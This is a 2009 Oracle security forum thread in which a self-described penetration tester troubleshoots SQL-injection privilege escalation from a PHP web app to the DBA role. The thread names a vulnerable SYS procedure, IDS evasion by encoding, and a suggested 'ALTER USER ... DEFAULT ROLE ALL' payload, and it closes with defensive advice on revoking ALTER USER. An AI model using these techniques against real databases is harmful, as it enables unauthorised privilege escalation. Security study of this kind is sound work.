|
||
Title: penetration test Post by Pete Finnigan on Dec 4th, 2009, 7:40pm 1. Apache+php+oci8 2. 10gR2 3. Script with sql injectable param 4. pl/sql function with sql injection :) I have a dba escalating privs with a sql injection in a local procedure created for admin panel to show current sessions and jobs, acces to listener i do not have. I test it from the web not from user net. I create a function with pragma and execute immediate i transmit it pl/sql but not all is executed and simple dml sql like "select user from dual" too... I do not understand where search a problem. IDS used, but i evade it chr()+base64+cursor and i grant to me a dba but i cant perform a simple DML ;D Magic? Sorry for my bad english |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 4th, 2009, 11:18pm SELECT PRIVILEGE FROM SESSION_PRIVS CREATE CLUSTER CREATE INDEXTYPE CREATE OPERATOR CREATE PROCEDURE CREATE SEQUENCE CREATE SESSION CREATE TABLE CREATE TRIGGER CREATE TYPE UNLIMITED TABLESPACE ____________________________________________ SELECT GRANTED_ROLE FROM USER_ROLE_PRIVS ADM_USER CONNECT DBA RESOURCE I try to select from dba_role_privs and i do not have privs... Maybe default role is problem? |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 6th, 2009, 9:26am Hi DSU, you didnt show the exploit sequence so its hard to see, but the session privs you have look like CONNECT and RESOURSE. Did you log out and log back in to see if DBA is available? - try logging out otherwise simply set the role dba when you have logged in. Its granted to your user and should not be password protected so try these two things. cheers Pete |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 6th, 2009, 5:29pm on 12/06/09 at 09:26:43, Pete Finnigan wrote:
Hi Pete This is problen because i do not have connect to listener, its php script he login and connect all when when it is start. I try execute immediate ('declare pragma... execute inmmediate ''set role dba'' ) Do not work... maybe problem is created functions its is authid, but in other schema? |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 6th, 2009, 7:21pm and i can show public function and proc with sql injection its a private code and post this on public forum... But injection is on point like this "... 'begin '||proc_name||'('||param1||','||param2||'...) inject like this select mmm.sql_func(' sql_inject_proc(...); proc_name,param1,param2,param3...) from dual Func return string if is ok 'Y' when others 'N' |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 7th, 2009, 8:28am Hi DSU, This sounds strange that DBA is not available for your exploit user. Its unlikely that the DBA role is not a default role as i have never seen a database like this in many many years. Its possible of course just not likely. The first issue is the most likely. sometimes when an exploit grants DBA to the same user running the exploit the DBA role is not available in the same session; you have to log out and log back in to see it. you showed that it was granted so logging out will not ungrant it; if you log back in and its still not enabled then it must be the case that its not a default role. cheers Pete |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 7th, 2009, 8:36am Hi Pete thanks for answer It's a php cms coded in 2003 year, its re-login all time when perform a serach :) yes its bad but not me write scripts I try to set the default role if i can... i find a vulnerable proc owned by sys. |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 7th, 2009, 8:46am GRANTED_ROLE default_role ADM_USER YES CONNECT YES DBA NO :( |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 7th, 2009, 9:59am OK, so that answers the issue, we now know its because the DBA role is not a default role for the exploited user. If you cannot issue a SET ROLE, then simply re-run the exploit, except this time dont set the payload to "GRANT DBA TO {...}" and instead modify it to ALTER USER {...} DEFAULT ROLE ALL". That way when you log back in again the DBA role will be enabled. Let us know if it works. cheers Pete |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 7th, 2009, 12:26pm I know about alter user and default role but i do not know result. This vulnerable proc work strange, i execute from it vulnerable function owned by sys (proc is too owned by sys :) ) DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC and nothing has changed. I open a oracle documentation to search the answer, hour later just for interes i select from role_privs and ... GRANTED_ROLE default_role DBA YES I do not understand maybe i on server is installed memcashe and role is set but webserver give a respond from cache... And Pete, exist a metod to denied "alter user" with "default role" to all? I think this is good step method to secure a oracle database... Thanks Pete |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 7th, 2009, 12:44pm Hi DSU, Glad it works! The protection is to prevent a user from having the ALTER USER system privilege; without it he cannot set his onw default roles or any other users default roles. Oracle have silently allowed certain system privileges to work even if they are not granted such as ALTER SESSION where you can issue all comments except to set trace. With ALTER USER you can issue it to change your own password but not to set default roles: SQL> connect system/xxxxxx@ora11 Connected. SQL> create user rol identified by rol; User created. SQL> grant dba to rol; Grant succeeded. SQL> connect rol/rol@ora11 Connected. SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- ROL DBA NO YES NO SQL> connect system/xxxxx@ora11 Connected. SQL> alter user rol default role none; User altered. SQL> connect rol/rol@ora11 ERROR: ORA-01045: user ROL lacks CREATE SESSION privilege; logon denied Warning: You are no longer connected to ORACLE. SQL> connect system/xxxxx@ora11 Connected. SQL> grant create session to rol; Grant succeeded. SQL> connect rol/rol@ora11 Connected. SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- ROL DBA NO NO NO SQL> alter user rol default role all; alter user rol default role all * ERROR at line 1: ORA-01031: insufficient privileges SQL> alter user rol identified by rol; User altered. SQL> So basically dont allow any user to have ALTER USER. cheers Pete |
||
Title: Re: penetration test Post by Pete Finnigan on Dec 7th, 2009, 2:15pm I understand... but if search and find sql inj. on sys or other users with dba. I search try to search on *.sql scripts and *.ora maybe exist method to complet disable a alter user "default role ..." or this is a core function of oracle? Thanks for answers :) |
||
Powered by YaBB 1 Gold - SP 1.4! Forum software copyright © 2000-2004 Yet another Bulletin Board |